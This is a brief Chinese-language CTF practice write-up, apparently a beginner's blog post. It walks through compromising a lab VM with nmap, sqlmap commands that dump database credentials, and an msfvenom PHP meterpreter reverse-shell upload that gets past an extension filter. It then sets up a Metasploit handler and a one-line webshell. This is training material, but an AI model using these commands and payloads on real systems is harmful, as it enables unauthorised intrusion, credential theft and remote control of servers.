SQL注入-GET引數注入
阿新 • • 發佈:2021-01-20
CTF練習
第一次CTF練習
1.拿到虛擬機器後開啟
一開始想用外部Xshell連線它,被老馮罵了一頓
2.開啟kali用nmap掃描該機器
nmap 192.168.80.135
發現該機器開啟了22和80埠
說明該機器開啟了ssh和http服務
3.瀏覽器檢視該機器的http服務
http://192.168.80.135
發現網站,有四個頁面,前三個是展示介面,第四個是登入介面
嘗試登入
4.用burpsuite抓包
嘗試進行使用者名稱和密碼爆破,失敗
失敗原因:密碼字典不夠強大(後面檢視發現只有8位數字和六位密碼,需要擴充自己的密碼本)
5.用owasp掃描網站
發現SQL注入的漏洞,將url複製(後面的引數不用複製)
6.用sqlmap進行sql注入
sqlmap -u “複製的url”–dbs 查詢資料庫
-D “db_name”–tables 查詢資料庫db_name的所有表
-T “AA” --columns查詢表AA的所有欄位
-C “BB”–dump 查詢BB列的資料
其中有好幾個“y”,使用sqlmap的預設字典進行破解
成功。進入資料庫,提取到使用者名稱admin和密碼p4ssw0rd
使用使用者名稱和密碼登入第四個介面
發現可以上傳檔案
7.使用msfvenom生成小馬
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.80.129 lport=8899 -f raw
raw就是直接生成語句,在終端直接顯示,不用放到任何檔案中
新建test.php檔案並將語句貼上進去,上傳
網頁顯示:“NO PHP!”將字尾改為PHP,再次上傳成功
8.開啟msfconsole
使用payload:exploit/multi/handler監聽129的8899埠得到回連的session
成功拿到shell
9.用一句話木馬,上傳一句話木馬檔案,使用菜刀連線後可對135上的檔案進行增刪改查